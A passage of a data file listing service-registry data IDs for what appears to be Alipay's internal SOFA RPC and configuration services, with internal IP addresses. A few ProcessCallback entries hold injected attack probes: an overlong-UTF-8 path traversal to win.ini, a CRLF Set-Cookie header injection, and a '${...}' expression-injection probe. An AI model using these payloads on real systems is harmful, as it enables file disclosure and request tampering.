de:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stocksupervise.common.service.facade.StockToolsDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.rule.ExpressionRuleMngNewConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.industry.IndustryPoolConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.experience.VcpExperienceQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:antwaf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:baseContractSignHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_basic_ostsBasicService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmngcore.common.service.facade.api.EventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finuserquote.facade.session.UnionSessionManageFacade:1.0:finuserquotelt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.openapi.abtest.DarwinABTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.api.ResourceManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.gwtools.common.service.facade.BpaasSecretFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.client.amountPrepareBizQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appfuse.biz.service.InvokeProxyService:1.0:appfuse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.commonreservation.PlanRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.OperatorServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfas.biz.daemon.handler.impl.IncomingReportProcessSchedulerEventHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.instance.FlowServiceApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datariskmarket.facade.RmResourceDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.itemcore.common.service.facade.v2.DisplayCategoryConsistentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchprod.common.service.facade.ops.OpsCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:addOriginRateCallBackHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.ProductFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.couponcoreButtonHidden,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ugstrategycenter.common.service.facade.generated.fixeddisplay.FixedDisplayConsultFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotbsp.business.facade.promotion.IoTClerkInspireManageFacade:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.appxcore.common.service.facade.api.servicelibrary.ServiceViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:PRODTRANS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.AccItemSendDrm.sendMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:apprOrderRecoveryLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.service.SecOpsClientChangeService:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_JIUZHOU#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopenscene.facade.fundanalysis.facade.FundAnalysisRoomConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.merchantdata.facade.MerchantPaySucRateFactorManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkCourseTitleEventListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.system.SystemReservedFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:funsavemoneytwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.QueueAPIService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ecoqltprod.biz.eco.service.EcoSpaceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rinsight.runtime.etl.repository.RinsightDataSourceRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:aliinvoiceboss@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.OrderAppManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_submit2PublishProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommons.common.spi.api.ArtisanComponentSpiFacade:1.0:customerBankSpi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dbackprod.service.facade.query.QueryDbackService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.store.facade.StorePunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.LinkqManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.industry.KbIndustryCapacityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.231.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.232.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ck:name=com.alipay.zdal.config.groupCluster.dassmetaDatasource1_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlegalchain.common.service.facade.api.BlockChainFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.restApiControl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bizfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.CreativeDeliverFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanamountprod.common.service.facade.service.SignupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEscape,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbprod.common.service.facade.marketing.TimeLimitedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.search.ShopLabelSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdecision.service.PcreditTradeSceneConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.ProdCommentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:antinvoice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.task.BackgroundTaskOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryReconTaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.TestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.item.ItemXProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.22.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:riskperceptcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compcore.common.service.facade.ai.ImageClassifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:lifemsgprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cschannel.common.service.facade.api.ServicePointQueryService:1.0.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.glBasicInfoSysByType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findecision.common.service.facade.IndexDataQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.ComplainFeedbackInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iconnect.common.facade.api.FatigueConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ismonitor.core.service.censor.config.CensorConfigClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.131.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydataservice:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbretailprod.common.facade.mall.MallActivityMcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.voucher.facade.VoucherUniformFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.transdata.ITransDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-frservcenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.23.232.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.graymng.common.service.facade.api.GrayTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0://www.baidu.com/\r\nSet-Cookie: iCook=iValue@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:promohelix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.otp.common.service.facade.api.OtpManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:memberprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantSearchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.120.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.config.api.ApiDirectBankRuleQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_ZIAN_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservcore.common.service.facade.message.DingDingMessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbmall.facade.user.UserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mrchiscore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.opensupport.common.service.facade.partner.PartnerCoBuildingOptLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:reservecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.index.IndexFundsListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.UserGroupFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.SimulateLinksFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.xflushBatchCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.130.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.membertangram.common.service.facade.crowd.CrowdExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.mng.WorkbenchDataMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebEteUserLimitQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.appointment.SpecDateAppointmentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.plugincenter.PluginOperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.cidChangeProdTransSwitchPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zhub.facade.service.ConnectV2Service:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dadeploymentunit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.DadaMedalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkqainfobox.facade.dbdata.DbDataQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:yebbffweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insautomarket.common.facade.allocation.AutoMktResourceAllocationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.core.service.spi.component.FindecisionDataManagerComponent:1.0:inner@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.nickname.NicknameFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:ecapiprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxbase.common.event.EventHandler:1.0:ifinfluxStreamQuoteEventHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sitecenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cfmng.cfmng_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:minicore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:channelrouter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:changeBind@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscale.api.MyBankDecisionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.106.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.namelist.WhiteListWriteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.SolutionCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.consult.CustOrgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.heralib.service.facade.api.ComputeStoreServiceFacade:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.188.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promobench.common.service.facade.service.DataCenterManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.partner.LimitCardPartnerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_FRDECISION_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:promox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pcinspect_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:finadvisormng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:obglobal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.bizprod.common.service.facade.api.FreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.stresstestmng.client.LoadCenterClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:?${28923030-65465363}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcsc.common.service.facade.contract.CreditContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.185.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.161.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:idpatrol@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.alsc.api.TbMerchantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.role.RoleTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_review2PublishProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.ecm.biz.task.executor.ExecutorManager:1.0:cfpExecutorManager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.dd.common.service.mng.facade.api.DecisionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finmatchcore:name=com.alipay.finmatchcore.common.service.facade.client.drm.MatchConfigClientDrm.flowControlLimitMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.146.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ceresdbconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.service.opcfg.WorkOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.report.ReceivableReportQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.space.CreativeServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.inspect.IdCrontabService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.habaseline.common.facade.service.change.seeker.ChangeSeekerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finfocore:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsApiVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbitemprod.common.service.facade.backend.api.BackendToolkitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.DesireOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.policy.service.ProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_SMART_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.130.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcardcore.common.service.facade.asset.AssetQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.28.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.gfas:name=com.alipay.zdatacontext.common.agent.drm.UniformAssertClientDRM.clientAvailabel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.BankCardDrmResource.tokenMapAppendCardNoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.reviseSyncKabaoVouchers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alidevice.biz.devicemanager.iotpaysdk.service.BoxBindQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.DrilledEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chaos.dig.facade.DrmFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inscharity.common.service.facade.InsCharityDonationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.verify.rpc.facade.TrainingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.scheduler.common.cluster.config.ClusterConfig.masterPort,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.meshyuniverse.core.rpc.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.service.RedPacketTokenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.biz.front.authorization.ack.remote.IRemoteAckVerifyProcessor:1.0:remoteAgreementAckVerifyProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingboss.biz.shared.manager.webproxy.CommonCrudInterface:1.0:bank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.64.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.revtrans.common.service.facade.api.CompanyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.live.LiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:FUND_SCHEME_PRODUCT_GROUP_MAPPING@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_LOADCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rccenter.common.service.facade.RccenterPortalRoleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:mrchcommercelab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_FCTCENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.uioservice.common.service.facade.api.RankWeightFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.